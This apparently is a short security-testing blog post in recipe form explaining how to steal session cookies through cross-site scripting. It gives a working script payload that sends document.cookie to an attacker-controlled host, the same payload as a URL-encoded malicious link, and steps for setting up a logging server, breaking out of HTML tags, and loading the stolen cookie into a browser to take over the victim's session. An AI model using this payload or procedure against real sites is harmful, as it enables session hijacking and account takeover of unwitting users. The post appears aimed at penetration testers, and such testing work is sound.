Problem :
How to steal cookies using XSS
Solution:
Stealing a user's cookie is the easiest real XSS attack. Inject something like the attack string shown below into a vulnerable parameter.
<script>document.write('<img height=0 width=0
src="http://attacker.example.org/cookie_log?cookie=' +
encodeURI(document.cookie) + '"/>')</script>
This will create a link like the one below. The script will be executed when you click on the link
http://www.example.com/example?vulnerable_param=%3Cscript%3E
document.write('%3Cimg%20height=0%20width=0%20
src=%22http://attacker.example.org/cookie_log%3Fcookie%3D'%20+%20
encodeURI(document.cookie)%20+%20'%22/%3E')%3C/script%3E
This is Sample malicious URL for stealing cookie.
Discussion:
Before attempting this attack, you will need to set up a web server somewhere (such as attacker.example.org as suggested in Example 1 ). Ensure that a file called cookie_log exists in the appropriate location on your web server. It does not actually need to log anything because the HTTP server will do the logging for you.
In the solution, you may need to experiment with various syntactic issues to get the attack to work. You may need to use characters such as ', ", and > to break out of existing HTML tags so that you can inject your script. View the HTML source of the web page to determine whether your input is resulting in syntactically correct HTML. Now, whenever that script executes, it will send the user's session cookie to attacker.example.org, which is controlled by the attacker. To view the cookies, simply view the httpd log files on your web server (attacker.example.org) or create a script called cookie_log that logs the parameters sent to it. Then, to gain access to that user's session, URI-decode the cookie and use a tool such as the Firefox Edit Cookies extension to add it to a browser. Then, you will be able to access the web application as the authenticated user from that browser
Vinay Jagtap
A hard core Technocrat with over a decade of extensive experience in heading complex test projects coupled with real time experience of project management and thought leadership. Extensive experience in Performance, Security and Automation Testing and development of automation frameworks and ability to setup and execute Global service centers and Center of Excellences for testing.
